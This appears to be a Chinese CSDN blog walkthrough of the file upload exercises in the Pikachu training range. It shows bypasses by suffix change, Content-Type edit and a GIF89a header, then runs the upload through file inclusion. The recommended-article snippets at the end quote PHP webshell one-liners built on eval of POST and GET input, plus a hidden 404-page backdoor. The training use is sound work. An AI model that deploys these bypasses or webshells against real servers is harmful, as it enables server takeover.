php一句话木马

已于 2022-03-30 23:51:19 修改
阅读量1.5w 收藏 27
点赞数 2
文章标签: 网络安全 数据库 前端 web安全 后端
于 2022-03-30 23:49:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlloveyouforever/article/details/123858904
版权

测试靶场 pikachu-master

pikachu漏洞平台文件上传漏洞概述

 即将进行利用的文件上传漏洞界面

$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);

if ($SELF_PAGE = "clientcheck.php"){
    $ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','','','','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}
$PIKA_ROOT_DIR =  "../../";
include_once $PIKA_ROOT_DIR . 'header.php';
include_once $PIKA_ROOT_DIR.'inc/uploadfunction.php';

$html='';
if(isset($_POST['submit'])){
    $type=array('jpg','jpeg','png');//指定类型
    $mime=array('image/jpg','image/jpeg','image/png');
    $save_path='uploads'.date('/Y/m/d/');//根据当天日期生成一个文件夹
    $upload=upload('uploadfile','512000',$type,$mime,$save_path);//调用函数
    if($upload['return']){
        $html.="<p class='notice'>文件上传成功</p><p class='notice'>文件保存的路径为:{$upload['save_path']}</p>";
    }else{
        $html.="<p class=notice>{$upload['error']}</p>";

    }
}

后台getimagesize.php文件的主要内容

 随意上传一张普通图片,显示上传成功

<?php phpinfo();?>

尝试上传php文件,其中文件内容如上

(构造一句话木马的方式以及具体代码有很多很多,由个人需求而定,CSDN上搜一句话木马php有很多文章,在下在这方面的知识尚不深刻,就不在这班门弄斧了)

反馈结果如上

 对a.php内容不做修改,直接将后缀名改为png,用burpsuite抓包,并将png改成php

修改后点击上传

 可以看到仍然和前面是一样的显示结果

修改后缀名但是不抓包修改内容尝试上传

 

被识破了哈哈 (第一关如上所示可以绕过后端验证,第二关抓包修改请求头里Content-Type的值可以绕过验证)

怎么绕过后端的检测呢,有很多种办法

在这里只介绍GIF89a图片头文件欺骗,这里不一一赘述,好,开搞!

GIF89a<?php phpinfo();?>

将a.png中的内容改成如上图,即在代码前加上了GIF89a。 

 上传成功了,那我们应该怎么检验呢

我们在pikachu看到了使用了include函数的另外一个模块(文件包含漏洞),这就好办了

根据pikachu中多个模块的url分析,最终得出以下路径

../../unsafeupload/uploads/2022/03/30/50444362447a43ad5d8128997197.png

 拼接在File Inclusion模块中就可以得到我们想要的结果,  phpinfo函数可以显示出PHP 所有相关信息。是排查配置php是是否出错或漏配置模块的主要方式之一,只要访问到phpinfo()函数的web页面,即返回php的所有相关信息。

热爱画家夫人
关注
  • 2
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP一句话木马大全
weixin_45901902的博客
05-31 5201
PHP一句话木马大全 由于PHP一句话木马可以说有很多,简单的、中等的、复杂的…,今天主要是分享一些比较强悍的一些PHP一句话木马大全; 一、利用404页面隐藏PHP小马 404 Not Found Not Found The requested URL was not found on this server. <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Foun
PHP一句话木马
Code-5的博客
04-17 1889
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了。WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。3. 利用文件导入的方式进行注入。
pikachu靶场 利用Rce上传一句话木马案例(工具:中国蚁剑)
m0_46745664的博客
06-30 834
pikachu靶场 利用Rce上传一句话木马案例(工具:中国蚁剑)
PHP一句话木马
热门推荐
bolinmengling的博客
02-27 2万+
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过P​OST是传入的参数,此处使用的...
PHP 一句话木马
weixin_30364147的博客
07-10 799
前言   在测试某网站时,发现为阿里云服务器,上传的一句话均被kill掉,于是搞了个过web安全狗,D盾,云盾的一句话木马,在此分享出来。 正文   一句话源码: 1 <?php 2 class a{ 3 public function __construct(){ 4 $this->a = $_REQUEST[...
一句话木马要点和防范注意事项
05-24
例如,一个简单的PHP一句话木马可能如下所示: ```php <?php eval($_GET['cmd']); ?> ``` 这个例子中,`eval`函数会执行通过GET参数`cmd`传入的任何PHP代码,从而让攻击者能够控制服务器。 了解了一句话木马的基本...
php一句话cmdshell新型 (非一句话木马)
10-30
PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
基于 python 实现的千倍速一句话木马密码爆破工具
最新发布
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
PHP网站中的一句话木马安全性和防范措施的研究.pdf
01-05
PHP一句话木马是一种使用eval函数来执行恶意代码的木马,通常的代码形式为`<?php @eval($_POST['pass']);?>`。其中,eval函数将字符串按照PHP代码来计算,@符号用于停止报错,而pass是木马连接器的访问密码,通过...
木马免杀只需要简单一句话的php
02-12
木马免杀只需要简单的一句话代码php文件就可以轻松过,可以参考
PHP一句话木马集合
闵行小鱼塘
05-21 1万+
whoam1(QQ:2069698797)大佬早些年做的PHP一句话木马集合,在此记录下
php 一句话木马简介
whatday的专栏
07-01 1万+
一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php @ev
关于PHP一句话木马
Hexin_Information的博客
12-04 846
之前关于某网站被攻击,多次更换备份代码无效的情况下,于是换了服务器,网站正常运行,但是将该域名(网址)发在QQ对话框里边,会提示说“危险网站,千万不要访问” 因此点击为什么危险?会出现这样的页面: 因此,做了站长申诉,只要将下面信息填写完整,提交就好了 在24小时内,会得到反馈: 提示说有一个危险页面,要删除了恶意信息后,4周后才可以再次申诉,因此使用360杀毒还有电脑安全
PHP一句话木马浅析
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-28 1368
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。PHP一句话木马的原理是利用了PHP中的eval()。 一句话木马的原理是利用了PHP中的eval()。 注:eval因为是一个语言构造器而不是一个函数,不能被可变函数调用。
一句话木马大全
2301_76786857的博客
06-14 6232
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,其基本原理是利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['attack']表示从页面中获得attack这个参数值。
php一句话木马
yep321的博客
08-09 2518
偶尔发现一句php代码: eval(stripcslashes($_GET['e'])); 有人说这是一句话木马,于是有了兴趣,便在W3C查了下函数,分析了一下,果然有些可怕。 eval()函数会执行括号内的字符串,比如 eval("echo 'hello world!';"); 等同于: echo "hello world!"; stripcslashes()函数是去反斜杠的,反斜
php一句话木马图片马
01-30
根据提供的引用内容,PHP一句话木马是一种利用PHP语言特性的恶意代码,它可以在服务器上执行命令并返回结果。而图片马是一种将恶意代码嵌入到图片文件中的攻击方式。下面是一个示例,展示了如何在PHP一句话木马中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值